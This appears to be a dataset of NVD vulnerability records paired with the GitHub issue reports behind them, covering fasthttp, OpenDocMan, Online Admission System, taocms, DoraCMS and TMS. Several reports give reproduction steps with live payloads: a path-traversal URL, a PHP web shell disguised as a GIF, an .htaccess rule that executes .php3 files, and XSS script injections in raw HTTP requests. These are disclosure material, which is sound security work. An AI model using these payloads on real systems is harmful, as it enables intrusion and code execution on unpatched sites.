"exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/valyala/fasthttp/commit/15262ecf3c602364639d465daba1e7f3604d00e8" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/valyala/fasthttp/commit/6b5bc7bb304975147b4af68df54ac214ed2554c1" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/valyala/fasthttp/issues/1226" }, { "source": "report@snyk.io", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/valyala/fasthttp/releases/tag/v1.34.0" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMVALYALAFASTHTTP-2407866" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/valyala/fasthttp/commit/15262ecf3c602364639d465daba1e7f3604d00e8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/valyala/fasthttp/commit/6b5bc7bb304975147b4af68df54ac214ed2554c1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/valyala/fasthttp/issues/1226" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/valyala/fasthttp/releases/tag/v1.34.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMVALYALAFASTHTTP-2407866" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasthttp_project:fasthttp:*:*:*:*:*:*:*:*", "matchCriteriaId": "B292937C-1EF2-4FD3-B714-90714DEC82E1", "versionEndExcluding": "1.34.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "22" ]
22
https://github.com/valyala/fasthttp/issues/1226
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "valyala", "fasthttp" ]
Hello, I found a problem when requesting - path traversal attacks (https://localhost/..%5clogs/app.log). If you specify a backslash (%5c) character in the path, then you can follow the path /../ and get data from the root. It may be worth adding a check for part of the path - /..\. strSlashDotDotBackSlash = []byte("/..\"). At your discretion. Thanks.
Path Traversal Attacks
https://api.github.com/repos/valyala/fasthttp/issues/1226/comments
7
2022-02-21T11:25:44Z
2024-01-09T08:13:57Z
https://github.com/valyala/fasthttp/issues/1226
1,145,672,097
1,226
3,371
CVE-2021-45834
2022-03-18T11:15:07.917
An attacker can upload or transfer files of dangerous types to the OpenDocMan 1.4.4 portal via add.php using MIME-bypass, which may be automatically processed within the product's environment or lead to arbitrary code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://opendocman.com" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/opendocman/opendocman" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opendocman/opendocman/issues/326" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opendocman/opendocman/issues/330" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://opendocman.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/opendocman/opendocman" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opendocman/opendocman/issues/326" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opendocman/opendocman/issues/330" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opendocman:opendocman:1.4.4:-:*:*:*:*:*:*", "matchCriteriaId": "E32B307D-542F-48EC-B7AA-8D7F4CA1A7CA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/opendocman/opendocman/issues/326
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "opendocman", "opendocman" ]
Hi there, I couldn't find a `SECURITY.md` in your repository and am not sure how to best contact you privately to disclose a security issue. Can you add a `SECURITY.md` file with an e-mail to your repository, so that our system can send you the vulnerability details? GitHub suggests that a [security policy](https://docs.github.com/en/code-security/getting-started/adding-a-security-policy-to-your-repository) is the best way to make sure security issues are responsibly disclosed. Once you've done that, you should receive an e-mail within the next hour with more info. Thanks! (cc @huntr-helper)
Trying to get in touch regarding a security issue
https://api.github.com/repos/opendocman/opendocman/issues/326/comments
0
2021-08-02T17:49:53Z
2021-08-02T17:49:53Z
https://github.com/opendocman/opendocman/issues/326
958,374,631
326
3,372
CVE-2021-45834
2022-03-18T11:15:07.917
An attacker can upload or transfer files of dangerous types to the OpenDocMan 1.4.4 portal via add.php using MIME-bypass, which may be automatically processed within the product's environment or lead to arbitrary code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://opendocman.com" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/opendocman/opendocman" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opendocman/opendocman/issues/326" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opendocman/opendocman/issues/330" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://opendocman.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/opendocman/opendocman" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opendocman/opendocman/issues/326" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opendocman/opendocman/issues/330" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opendocman:opendocman:1.4.4:-:*:*:*:*:*:*", "matchCriteriaId": "E32B307D-542F-48EC-B7AA-8D7F4CA1A7CA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/opendocman/opendocman/issues/330
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "opendocman", "opendocman" ]
**Describe the bug** Attacker can upload files with dangerous types to the OpenDocMan 1.4.4 via add.php using MIME-bypass. File is available under specific ID, which is returned in response from application. **To Reproduce** Steps to reproduce the behavior: 1. Login to the application 2. Click on "Add Document" 3. Create a file named "example.php.gif" containing string: `GIF89a;<?php echo shell_exec($_GET['cmd']); ?>` 5. The document is being successfully uploaded and the _Location_ header is describing the location of the file. 6. The file is available under provided ID with .dat extension under /document_repository directory. **Expected behavior** Application should reject the file based on the magic bytes provided. **Screenshots** Step 1: Adding the document with malicious content. ![proof](https://user-images.githubusercontent.com/63229183/158818270-4a7edf13-ec4b-43a5-bdf1-74fd15d507ef.PNG) Step 2: Retrieving the content. ![proof2](https://user-images.githubusercontent.com/63229183/158818353-06b125b4-3660-468f-9fba-aeb5cd1f663e.PNG) **Versions (where applicable):** - OpenDocMan: 1.4.4 - MySQL: 10.4 - PHP: 7.0 - Web Server Type: Apache - Web Server Version: 2.4.51 - OS: [e.g. iOS] Kali Linux/Debian - Browser [e.g. chrome, safari] Firefox - Browser Version [e.g. 22] 91.5.0esr
Security Vulnerability - Unrestricted File Upload
https://api.github.com/repos/opendocman/opendocman/issues/330/comments
0
2022-03-17T13:27:08Z
2022-03-17T13:27:08Z
https://github.com/opendocman/opendocman/issues/330
1,172,387,431
330
3,373
CVE-2021-45835
2022-03-18T11:15:07.967
The Online Admission System 1.0 allows an unauthenticated attacker to upload or transfer files of dangerous types to the application through documents.php, which may be used to execute malicious code or lead to code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rskoolrash/Online-Admission-System" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rskoolrash/Online-Admission-System/issues/2" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/50623" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rskoolrash/Online-Admission-System" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rskoolrash/Online-Admission-System/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/50623" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:online_admission_system_project:online_admissions_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "FADE83E7-D06C-446D-9B6F-BAD2F81939AF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/rskoolrash/Online-Admission-System/issues/2
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rskoolrash", "Online-Admission-System" ]
Hello, I'm trying to reach you regarding security vulnerability I have found in your application. Can you add a `SECURITY.md` file with an e-mail to your repository, so that our system can send you the vulnerability details? GitHub suggests that a security policy is the best way to make sure security issues are responsibly disclosed. Once you've done that, you should receive an e-mail within the next hour with more info. Thanks!
Security Vulnerability
https://api.github.com/repos/rskoolrash/Online-Admission-System/issues/2/comments
1
2021-12-23T12:27:37Z
2022-03-17T12:56:13Z
https://github.com/rskoolrash/Online-Admission-System/issues/2
1,087,673,026
2
3,374
CVE-2022-25578
2022-03-18T23:15:07.710
taocms v3.0.2 allows attackers to execute code injection via arbitrarily editing the .htaccess file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product", "URL Repurposed" ], "url": "http://taocms.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "URL Repurposed" ], "url": "http://taocms.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/28" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/taogogo/taocms/issues/28
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
We click on file management to go to the management location of the website and directory. ![image](https://user-images.githubusercontent.com/54017627/154784040-c571d842-3a18-49b2-a697-41858984921b.png) Click to edit the .htaccess file and add a line at the end, 'AddType application/x-httpd-php.php3', click Save. The function of the statement 'AddType application/x-httpd-php .php3' is to execute all files with the .php3 suffix as .php files. ![image](https://user-images.githubusercontent.com/54017627/154784292-2bef774f-d834-4023-a73f-a1be3cf4d357.png) We create a 1.php3 file and write'<? php phpinfo (); ?>'to 1.php3. ![image](https://user-images.githubusercontent.com/54017627/154784394-10d479c5-e0b4-4a34-94b2-d7c75155d615.png) ![image](https://user-images.githubusercontent.com/54017627/154784453-82cd23c8-9ef0-47ea-843b-6505470ab808.png) Visit the 1.php3 file in the directory of the website and find that it has been executed successfully. It's really great. ![image](https://user-images.githubusercontent.com/54017627/154784502-e2cd9655-8e4f-4885-bfcb-c96b14bf4d5a.png)
Code injection caused by arbitrary file editing vulnerability in taocms3.0.2
https://api.github.com/repos/taogogo/taocms/issues/28/comments
0
2022-02-19T03:32:57Z
2022-02-19T03:32:57Z
https://github.com/taogogo/taocms/issues/28
1,144,266,602
28
3,375
CVE-2022-25464
2022-03-20T19:15:07.610
A stored cross-site scripting (XSS) vulnerability in the component /admin/contenttemp of DoraCMS v2.1.8 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/doramart/DoraCMS/issues/255" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/doramart/DoraCMS/issues/255" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:html-js:doracms:2.1.8:*:*:*:*:*:*:*", "matchCriteriaId": "1FFA2258-7C76-482B-8076-AAD87B371A21", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/doramart/DoraCMS/issues/255
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "doramart", "DoraCMS" ]
[Suggested description] There is a storage XSS vulnerability in the background / admin / contenttemp module of doracms system. The user can access index HTML and 404 HTML page number will trigger JS pop-up. [Vulnerability Type] Storage XSS vulnerability [Vendor of Product] https://github.com/doramart/DoraCMS [Affected Product Code Base] DoraCMS v2.1.8 [Attack Type] Remote [Impact Code execution] true [Vulnerability proof] Step 1: log in to doracms and visit the admin / contenttemp page at URL: http://127.0.0.1:8080/admin/contentTemp。As can be seen from the figure below, the template is a page frequently visited by users, such as 404 html、index. html。 ![image](https://user-images.githubusercontent.com/85676107/154801346-54340fbd-9030-4a19-a1a1-88aeefac265b.png) Step 2: enter the JS code < script > alert (1) < / script > in the template, as shown in the following figure. ![image](https://user-images.githubusercontent.com/85676107/154801374-e0cbc161-4991-41e8-a402-f97b3b46fb25.png) ![image](https://user-images.githubusercontent.com/85676107/154801389-4a70a634-8cd5-4ee2-a5a8-3030b30dc804.png) Step 3: after saving the changes, visit 404 HTML and index HTML, trigger JS code execution pop-up window. ![image](https://user-images.githubusercontent.com/85676107/154801405-0abce27d-5ffe-4892-ab57-c9b43391b46e.png) ![image](https://user-images.githubusercontent.com/85676107/154801411-b33acdf1-88bd-433d-a8a7-0786dc5044e6.png)
There is a stored xss vulnerability exists in DoraCMS
https://api.github.com/repos/doramart/DoraCMS/issues/255/comments
0
2022-02-19T12:51:51Z
2022-02-19T12:51:51Z
https://github.com/doramart/DoraCMS/issues/255
1,144,694,355
255
3,376
CVE-2022-26246
2022-03-20T19:15:07.660
TMS v2.28.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /TMS/admin/setting/mail/createorupdate.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xiweicheng/tms/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xiweicheng/tms/issues/15" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tms_project:tms:2.28.0:*:*:*:*:*:*:*", "matchCriteriaId": "C30D9217-6E4A-47E6-8D1C-201F06981881", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xiweicheng/tms/issues/15
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xiweicheng", "tms" ]
[Suggested description] Cross SIte Scripting (XSS) vulnerability exists in tms. The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/ createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed. [Vulnerability Type] Cross Site Scripting (XSS) [Vendor of Product] https://github.com/xiweicheng/tms [Affected Product Code Base] v2.28.0 [Affected Component] POST /tms/admin/setting/mail/createOrUpdate HTTP/1.1 Host: localhost:8080 Content-Length: 113 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" Accept: */* X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost:8080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:8080/tms/admin/setting Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: JSESSIONID=CDC518A82EFF7D857356EBF9AB4206D2; locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645601594 Connection: close host=smtp.163.com&port=25%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&username=someone%40163.com&password=&addr=&= [Attack Type] Remote [Impact Code execution] true [Vulnerability proof] 1.Access URL: http://localhost:8080/tms/admin/setting , enter the system setting interface ![image](https://user-images.githubusercontent.com/85676107/155281262-0816a893-788d-47ab-9f94-9ae081709811.png) 2.Enter JS code in the form: <script> alert ("XSS") </script > ![image](https://user-images.githubusercontent.com/85676107/155281298-8bd131b0-159d-40cd-ab2e-d5c8e8c8fcc8.png) ![image](https://user-images.githubusercontent.com/85676107/155281339-7f848526-78a9-4822-8ec3-e3b53f129a93.png) 3.Click Save to trigger a pop-up window, and the loophole reappearance is completed. ![image](https://user-images.githubusercontent.com/85676107/155281371-35b2ff32-4ced-40ea-8a53-dd645a66d20c.png) 4.The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/ createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed. ![image](https://user-images.githubusercontent.com/85676107/155281406-8f48ff01-165a-48a0-a911-88518b0bbac1.png) ![image](https://user-images.githubusercontent.com/85676107/155281776-fbc93145-9579-4949-87f3-a5aab75c91e9.png)
There is a cross site scripting vulnerability exists in tms
https://api.github.com/repos/xiweicheng/tms/issues/15/comments
1
2022-02-23T08:11:56Z
2022-03-26T13:25:44Z
https://github.com/xiweicheng/tms/issues/15
1,147,782,609
15
3,377
CVE-2022-26247
2022-03-20T19:15:07.707
TMS v2.28.0 contains an insecure permissions vulnerability via the component /TMS/admin/user/Update2. This vulnerability allows attackers to modify the administrator account and password.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xiweicheng/tms/issues/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xiweicheng/tms/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:teamwork_management_system_project:teamwork_management_system:2.28.0:*:*:*:*:*:*:*", "matchCriteriaId": "DE8ABD88-819F-4ED4-92B8-23A9A515596B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "732" ]
732
https://github.com/xiweicheng/tms/issues/16
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xiweicheng", "tms" ]
[Suggested description] There is an ultra vires vulnerability in the function of modifying personal information in TMS.The vulnerability originates from / TMS / admin / user / Update2. The administrator account and password can be modified beyond his authority by modifying the packet parameters. [Vulnerability Type] Insecure Permissions [Vendor of Product] https://github.com/xiweicheng/tms [Affected Product Code Base] v2.28.0 [Affected Component] POST /tms/admin/user/update2 HTTP/1.1 Host: localhost:8080 Content-Length: 66 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" Accept: */* X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost:8080/ Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:8080/tms/admin/user 